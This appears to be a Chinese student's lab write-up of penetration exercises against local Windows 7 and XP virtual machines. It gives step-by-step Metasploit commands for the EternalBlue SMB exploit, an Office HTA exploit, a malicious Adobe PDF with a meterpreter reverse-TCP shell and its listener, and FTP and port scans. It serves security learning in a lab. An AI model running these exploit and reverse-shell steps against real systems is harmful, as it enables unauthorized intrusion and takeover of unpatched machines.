攻擊方:kali 192.168.21.130
靶機: win7 192.168.21.128
永恆之藍漏洞是利用框架中一個針對SMB服務進行攻擊的漏洞,該漏洞致使攻擊者在目標系統上能夠執行任意代碼。
進入msfconsole
輸入 use exploit/windows/smb/ms17_010_eternalblue
。而且經過show payloads
顯示可用攻擊載荷。
設置tcp反向鏈接:
設置參數:
輸入:exploit
滲透成功:
sql
攻擊方:kali 192.168.21.130
靶機: win7 192.168.21.128
咱們先啓動msfconsole
並使用模塊use exploit/windows/fileformat/office_word_hta
查看目標show targets
show options
,能夠看到已經默認幫咱們配置好了,咱們只須要run
執行便可,相應的產生了一個URL。
在靶機的IE瀏覽器中輸入KALI中生成的URL,出現一個窗口,點擊運行便可:
看到kali那裏已經產生了session會話,咱們按下回車回到命令行,使用sessions -i 1
來與第一個session
創建鏈接,再輸入shell
拿到權限:
輸入指令測試,滲透陳成功:
shell
本次實驗在win7中實驗並無成功,因而我將靶機換成XP系統。
查看靶機ip:
kali輸入msfconsole
進入控制檯,依次輸入如下命令
攻擊方:kali 192.168.21.130
靶機: win7 192.168.21.131
use windows/fileformat/adobe_cooltype_sing
:選擇攻擊模塊
set payload windows/meterpreter/reverse_tcp
:設置tcp反向鏈接
set LHOST 192.168.21.130
:kali IP
set LPORT 5235
:設置攻擊端口
set FILENAME 20165235.pdf
:設置生成的pdf文件名
exploit
:發起攻擊
我是第二次作的時候截的屏,因此沒有顯示文件路徑。將20165235.pdf複製到XP中。重啓控制檯,而且輸入如下命令進入監聽模塊:
use exploit/multi/handler
:進入監聽模塊
set payload windows/meterpreter/reverse_tcp
:設置tcp反向鏈接
set LHOST 10.0.0.138
:kali IP
set LPORT 5330
:設置攻擊端口
exploit
:監聽
接着在XP中打開20165235.pdf文件:
滲透成功:
關閉20165235.pdf,鏈接斷開:
數據庫
攻擊方:kali 192.168.21.130
靶機: win7 192.169.21.128
本次的模塊是經過MSF滲透幫助手冊中找到的。功能是能夠查詢到某一網段中的ftp服務器以及其操做系統的類型。
首先在win7中搭建一個ftp服務器,具體的過程能夠上網查找。一下是搭建好的ftp服務器:
測試ftp服務器是否可用:
進入msfconsole
,輸入use auxiliary/scanner/ftp/ftp_version
,設置要掃描的網段範圍:set RHOSTS 192.168.21.1-254
,設置線程數:set THREADS 55
,(線程數是每次掃描的主機個數。),直接輸入run
便可看到結果:192.168.21.128:被掃描出來,並分析出是微軟的Windows操做系統。
windows
攻擊方:kali 192.168.21.130
靶機: win7 192.168.21.128
建立msf所需的數據庫:
service postgresql start
msfdb start
進入msfconsole
,使用auxiliary/scanner/portscan/tcp
模塊,用來掃描靶機的TCP端口使用狀況。執行命令use auxiliary/scanner/portscan/tcp
進入並使用模塊:輸入show options
查看須要設置的參數信息:
設置參數:set RHOSTS 192.168.21.128
,set PROTS 1 - 5235
(掃描1到5235端口),以後使用run
,進行掃描。
瀏覽器
encode:是編碼的意思。將payload進行屢次編碼後,使改變其形態。服務器
經過本次的實踐,學會了利用MSF進行多種方式的滲透,不敢說能靈活應用而且實戰,可是學到了很多東西。在進行實驗時,網上的資料太少,並且對好多模塊並不知道它的意思以及用法,因而我就翻出它的英文幫助手冊,利用翻譯軟件看懂了使用方法。在之後的學習過程當中必定要活學活用。網絡
首先是攻擊手法單一,應用不靈活,在實戰中要求使用多種方法,學會去掃描靶機的漏洞以及可用的端口等。要真正的應用於實戰就要咱們能靈活的使用MSF提供的大部分的攻擊手段,同時也得學會使用其餘的攻擊平臺。session